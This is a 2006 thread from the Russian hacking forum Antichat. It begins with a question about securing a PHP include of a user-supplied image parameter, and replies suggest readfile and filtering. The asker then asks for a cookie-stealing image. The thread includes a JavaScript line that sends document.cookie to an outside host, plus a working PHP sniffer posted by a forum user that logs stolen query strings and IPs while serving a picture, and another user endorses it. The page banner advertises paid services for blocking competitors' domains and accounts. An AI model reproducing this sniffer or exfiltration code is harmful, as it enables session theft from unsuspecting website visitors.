Форум АНТИЧАТ - Безопасное использование include

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Безопасное использование include

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Безопасное использование include

14.05.2006, 18:47

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Отправить сообщение для EST a1ien с помощью ICQ

Безопасное использование include

Есть скрипт ему передаётся параметр img.
Например script.php?img=http://site.ru/img.gif
Дак вот я зделал такую проверку

PHP код:


		
			
if (!strstr($image,'.gif')=='.gif') {$image='sm.gif';}

Дальше идёт

PHP код:


		
			
Header("Content-type: image/gif");
include($image);

Тоесть файл обязательно должен быть .gif , но этого недостаточно так как в img.gif может быть PHP код и он выполнится ведь так??
Если да то как от этого защитится??
-------------------------------
И ещё один вопрос как отобразить через javascript картинку которая является снифером.
Например

Код:

img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;

Img.gif это php скрипт который выводит картинку но таким javascript'ом она невыводится только тырятся куки , а нужен скрипт который и тырит куки и отображает картинку, если это возможно.

14.05.2006, 19:57

nerezus

Pagan Heart

Регистрация: 12.08.2004

Сообщений: 3,791

Провел на форуме:
6490435

Репутация: 2290

Отправить сообщение для nerezus с помощью ICQ

Что за бред? Зачем инклюдить, кстати: Юзай http://us3.php.net/readfile =)

14.05.2006, 19:58

LoFFi

Участник форума

Регистрация: 21.02.2006

Сообщений: 285

Провел на форуме:
1347867

Репутация: 408

Отправить сообщение для LoFFi с помощью ICQ

попробуй

PHP код:


		
			
<?

...

if (!strstr($image,'.gif')=='.gif') {$image='sm.gif';}  

header("Content-Type: image/gif");

$ff = fopen($image,"rb");

fpassthru($ff);

fclose($ff);

?>

14.05.2006, 20:04

LoFFi

Участник форума

Регистрация: 21.02.2006

Сообщений: 285

Провел на форуме:
1347867

Репутация: 408

Да, и вот тебе пример сниффа....

PHP код:


		
			
<?

$query = $_SERVER['QUERY_STRING'];

$ip = $_SERVER['REMOTE_ADDR'];



if(!file_exists("log.txt")) fclose(fopen("log.txt","w"));

$out = fopen("log.txt","a");

fputs($out,"IP:".$ip."Query:".$query);

fclose($out);



header("Content-Type: image/jpg");

$img = fopen("image.jpg","rb");

fpassthru($img);

fclose($img);

?>

14.05.2006, 20:13

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

На первый вопрос ответили всем спасибо.
Теперь бы хотелось услышать ответ на второй.

Последний раз редактировалось EST a1ien; 14.05.2006 в 20:20..

14.05.2006, 20:23

nerezus

Pagan Heart

Регистрация: 12.08.2004

Сообщений: 3,791

Провел на форуме:
6490435

Репутация: 2290

2. Фильтровать все вводимые значения.

15.05.2006, 07:14

Trinux

Познавший АНТИЧАТ

Регистрация: 26.11.2004

Сообщений: 1,149

Провел на форуме:
941818

Репутация: 569

Ага, с добрым утром всех.
getimagesize() еще никто не отменял. Да и как правильно заметил nerezus, readfile более оптимальное решение для поставленной задачи. Тестировал скорость работы readfile и include (хотя че тут тестить - ежу понятно что include тормознее в разы). Да и потом если ты делаешь header() с заголовком картинки, а потом readfile()...

Насчет твоего второго вопроса - все просто, скрипт подкинул LoFFi.

2 LoFFi
в данном примере проще юзать readfile, чем fopen.

15.05.2006, 07:42

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Всё с первым я уже разобрался, просто забыл про readfile совсем из головы вылетела, что можно читать, а не инклудить файлы.
А на второй вопрос я так и неполучил чёткого ответа.

15.05.2006, 07:54

Trinux

Познавший АНТИЧАТ

Регистрация: 26.11.2004

Сообщений: 1,149

Провел на форуме:
941818

Репутация: 569

Цитата:

А на второй вопрос я так и неполучил чёткого ответа.

ошибаешься

#10

15.05.2006, 08:24

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

И гдеже ответ на второй вопрос

Цитата:

И ещё один вопрос как отобразить через javascript картинку которая является снифером.
Например Код:

img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Великобритания введет налог на использование офисных компьютеров в личных целях	TaNkist	Мировые новости	1	02.05.2006 18:43
Использование .htaccess	foreva	Чужие Статьи	0	07.02.2005 13:01
Использование поиска по интернету в своих целях	foreva	Чужие Статьи	0	07.02.2005 12:55
применение include в php-скриптах в своих целях	YooogI	Чужие Статьи	0	06.02.2005 19:01
Использование спец. символов в нике		Чаты	6	30.09.2002 10:39

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход